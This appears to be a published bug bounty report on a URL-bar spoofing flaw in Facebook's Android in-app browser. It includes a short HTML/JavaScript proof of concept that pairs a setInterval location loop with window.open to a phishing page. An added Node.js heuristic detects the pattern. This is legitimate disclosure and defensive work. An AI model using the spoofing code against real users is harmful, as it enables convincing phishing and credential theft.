Rahul Kankrale

Published On: 13 May 2019

$3,000

URL spoofing in Facebook Mobile Browser

Other
Facebook | Android
MEDIUM VALID
Description

This could have let a malicious user spoof the URL bar of multiple Facebook Android apps by navigating to a different domain on the original tab after a new tab had been opened using the setInterval method.

Impact

An attacker could carry out a convincing phishing attack against a Facebook user while the address bar shows a valid SSL Facebook URL.

Reproduction Steps

Step 1

Create an HTML file with the snippet below:

<script>
  // Reassign the current tab's location to the Facebook URL
  function fb() {
    location = "https://m.facebook.com/";
  }
  // Call fb() every 10 ms
  setInterval("fb()", 10);
</script>

The JavaScript above calls the fb() function every 10 ms, assigning the given URL to window.location each time (it is a kind of DDoS).

Then add the snippet below to call window.open:

<img src="/fblogin.png" onclick="window.open('http://yourdomain/phishingpage.html')">

The HTML above calls window.open when the image is clicked (this can also be automated).

Once clicked, this opens your phishing page in a new window while the address bar keeps showing the URL that setInterval keeps navigating to.

So the address bar shows the HTTPS URL while the phishing page is displayed.
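As an added example (not code from this report or from Facebook), here is a small Node.js heuristic that a content scanner or in-app browser test suite could use to flag pages combining the two ingredients described above: a timer that keeps reassigning window.location, and a window.open call. The regexes and the two sample pages are constructed for this illustration.

```javascript
// Added example, not code from the report: heuristic static check flagging HTML
// that pairs a timer reassigning window.location with a window.open call.
// Matches an assignment to location / window.location / location.href (not ==).
const LOCATION_ASSIGN = /\b(?:window\.)?location(?:\.href)?\s*=(?!=)/;

// Names of declared functions whose body assigns to location.
function functionsAssigningLocation(js) {
  const names = [];
  const fnRe = /function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{([^}]*)\}/g;
  let m;
  while ((m = fnRe.exec(js)) !== null) {
    if (LOCATION_ASSIGN.test(m[2])) names.push(m[1]);
  }
  return names;
}

// True if setInterval/setTimeout schedules a location-assigning callback given
// as an inline function, a bare identifier (fb) or a string ("fb()").
function hasTimedNavigation(js) {
  const names = functionsAssigningLocation(js);
  const timerRe = /set(?:Interval|Timeout)\s*\(\s*([^,]+),/g;
  let m;
  while ((m = timerRe.exec(js)) !== null) {
    const cb = m[1].trim();
    if (LOCATION_ASSIGN.test(cb)) return true;
    const ident = cb.replace(/^["'`]|["'`]$/g, '').replace(/\(\)\s*;?$/, '');
    if (names.includes(ident)) return true;
  }
  return false;
}

// Extracts inline <script> bodies and on*="..." handlers, then reports whether
// both halves of the spoofing pattern are present.
function analyzeHtml(html) {
  const scripts = [...html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)].map(m => m[1]);
  const handlers = [...html.matchAll(/\son\w+\s*=\s*(["'])([\s\S]*?)\1/gi)].map(m => m[2]);
  const js = scripts.join('\n');
  const timedNavigation = hasTimedNavigation(js);
  const opensWindow = /window\.open\s*\(/.test([js, ...handlers].join('\n'));
  return { timedNavigation, opensWindow, suspicious: timedNavigation && opensWindow };
}

// Constructed samples: the report's snippet, and a benign page that only polls.
const SPOOF_SAMPLE = `<script> function fb() { location = "https://m.facebook.com/" }
 setInterval("fb()", 10); </script>
<img src="/fblogin.png" onclick="window.open('http://yourdomain/phishingpage.html')">`;
const BENIGN_SAMPLE = `<script>setInterval(poll, 1000); function poll() { fetch('/status'); }</script>`;

console.log(analyzeHtml(SPOOF_SAMPLE), analyzeHtml(BENIGN_SAMPLE));
```

The check is deliberately coarse: it will miss callbacks built with eval-style string concatenation and will not follow navigation triggered from external scripts, so treat a hit as a signal for review rather than proof.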


Not applicable to Valid

This bug was closed as NA initially as a social engineering attack, but I have chained it with another bug, then FB triaged it; I will publish the chained part once it is fixed.


Timeline

Rahul, 09 Oct 2018: Initial report sent

Facebook, 16 Oct 2018: Triaged

Facebook, 18 Mar 2019: Bounty awarded